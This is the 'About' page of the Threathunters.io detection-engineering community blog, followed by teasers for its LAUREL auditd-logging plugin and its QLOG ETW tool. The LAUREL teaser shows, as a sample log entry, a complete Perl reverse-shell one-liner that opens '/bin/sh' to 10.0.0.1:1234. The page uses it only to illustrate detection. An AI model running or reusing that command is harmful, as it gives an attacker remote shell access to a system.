Direkt zum Hauptbereich

About Threathunters.io

Who we are?

TL;DR;

Threathunters.io was initiated by the Deutsche Bahn CSIRT to create a strong community for detection engineering & incident response. 

We are a community of voluntary incident responders & detection engineers around the globe, who spent their spare time to help the security community with tools and practical knowledge to support building better detection and response capabilities.

Please visit https://threathunters.io/ for more information.

You may also like our GIT repository and our BLOG.


Happy hunting!

@securityfreax

Beliebte Posts aus diesem Blog

Introducing LAUREL: Linux Audit – Usable, Robust, Easy Logging

LAUREL is an event post-processing plugin for _auditd(8)_ to improve its usability in modern security monitoring setups. Why? TLDR: Instead of audit events that look like this… type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742… …turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance: { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …} This happens at the source. The generated event even contains useful information about the sp
Read more »

QLOG - ETW logging for process creation events

  What is Qlog QLOG provides lightweigth userland logging of process create events on Windows written in C#. It's under development and currently in experimental state. QLOG uses ETW to collect telemetry, it  doesn’t use API hooks and it doesn’t require a driver to be installed on the target system, Currently QLOG supports “process create” events, but other enriched events may follow soon. QLOG runs as a Windows Services, but can also run in console mode, if you want to output to console directly. I've started QLOG to get a better understanding of Windows ETW and some Windows Eventlog APIs. QLOG is a research experiment, please don't use it on production systems. Update July, 2022 We started QLOG as an experiment to learn more about Windows ETW. QLOG provides enriched Logging for process creation events on Windows. We have stopped development of QLOG because in the meantime free tools were published which use ETW for telemetry and do a way better job than QLOG. Curious? Hav
Read more »